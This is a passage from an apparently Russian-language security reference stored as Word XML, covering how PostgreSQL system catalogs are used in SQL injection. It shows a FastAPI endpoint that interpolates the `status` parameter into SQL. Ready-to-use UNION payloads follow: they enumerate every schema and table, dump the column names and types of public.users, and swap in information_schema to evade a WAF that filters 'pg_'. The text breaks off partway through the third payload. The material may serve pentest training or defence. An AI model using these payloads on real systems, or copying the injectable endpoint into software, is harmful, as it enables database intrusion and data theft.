                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> plpgsql-функций — owner или явный GRANT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SUPERUSER (для </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">rolpassword</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pg_roles</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> без хешей — PUBLIC</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3.8.4</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3.8.5</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 SELECT на дампируемой таблице (для </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">table_to_xml</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserv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3.8.6</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 регрессия CVE-2024-4317 или CVE-2025-8713 (обход ACL/RLS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эта таблица — заменитель блока «Требования к среде» в карточках 3.8.1–3.8.6 в части привилегий. В каждой карточке оставлен короткий пункт «Привилегии: см. таблицу в 3.8.0», специфика версий и расширений по-прежнему расписана детально.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8.1 pg_class, pg_namespace, pg_attribute — карта схем, таблиц, колонок</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Три системных каталога однозначно описывают всю структуру БД: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 схемы,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 таблицы/view/индексы/последовательности в этих схемах,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 колонки этих таблиц с типами. SELECT на них по умолчанию выдан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — любая аутентифицированная роль читает их свободно, даже если у неё нет права читать конечные пользовательские таблицы. Через инъекцию в SELECT-эндпоинт атакующий тремя UNION-запросами получает полную карту БД: перечень схем, имена таблиц приложения и точные имена/типы колонок для подбора последующих UNION-инъекций.</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app/api/v1/orders.py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@router.get("/orders")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def list_orders(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    status: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f"SELECT id, customer, total FROM orders WHERE status = '{status}'"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status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> напрямую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Три колонки в SELECT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numeric</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — атакующему нужно подобрать UNION с совместимыми типами. Для метаданных всё подгоняется к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A — список таблиц во всех схемах</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `status`):</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n.nspname || '.' || c.relname, 0 FROM pg_class c JOIN pg_namespace n ON c.relnamespace = n.oid WHERE c.relkind = 'r' AND n.nspname NOT IN ('pg_catalog', 'information_schema')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 total FROM orders WHERE status = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0, n.nspname || '.' || c.relname, 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_class c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN pg_namespace n ON c.relnamespace = n.oid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE c.relkind = 'r'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND n.nspname NOT IN ('pg_catalog', 'information_schema')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customer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP-ответа атакующий получает все пользовательские таблицы в формате </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">schema.table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public.orders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public.users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audit.events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analytics.user_clicks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и т.п. Фильтр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">relkind = 'r'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> оставляет только обычные таблицы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = view,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 index,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 sequence, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = materialized view, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = foreign table — добавляются по мере необходимости). Исключение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отрезает 300+ системных таблиц-шумов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — колонки конкретной таблицы (с типами)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">После Payload A атакующий выбрал цель — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">public.users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Теперь нужны имена и типы колонок для подбора UNION-payload-а на эту таблицу.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `status`):</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a.attnum, a.attname, 0 FROM pg_attribute a WHERE a.attrelid = 'public.users'::regclass AND a.attnum &gt; 0 AND NOT a.attisdropped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 total FROM orders WHERE status = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT a.attnum, a.attname, 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_attribute a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE a.attrelid = 'public.users'::regclass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND a.attnum &gt; 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND NOT a.attisdropped --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Возвращается список колонок таблицы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">public.users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в порядке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">attnum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. С типами:</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a.attnum, a.attname || ':' || format_type(a.atttypid, a.atttypmod), 0 FROM pg_attribute a WHERE a.attrelid = 'public.users'::regclass AND a.attnum &gt; 0 AND NOT a.attisdropped --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Условие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">a.attnum &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> отсекает системные псевдо-колонки (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ctid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xmin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xmax</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cmin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cmax</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tableoid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — у них </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">attnum &lt; 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NOT a.attisdropped</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — отсекает логически удалённые колонки (после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER TABLE DROP COLUMN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> запись остаётся в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для совместимости storage).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Каст </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'public.users'::regclass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> валидирует существование таблицы на этапе парсинга и сразу возвращает её OID. Если таблицы нет, payload падает с ошибкой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">relation "public.users" does not exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это error-based проверка, а не сбой инъекции.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — `information_schema` как альтернатива при WAF-фильтре на `pg_`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WAF часто блокирует подстроки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SQL-стандартный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обычно остаётся открытым и читается PUBLIC: он внутри реализован как view поверх тех же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но имена в нём другие.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `status`):</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table_schema || '.' || table_name, 0 FROM information_schema.tables WHERE table_schema NOT IN ('pg_catalog', 'information_schema')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 total FROM orders WHERE status = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0, table_schema || '.' || table_name, 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM information_schema.tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
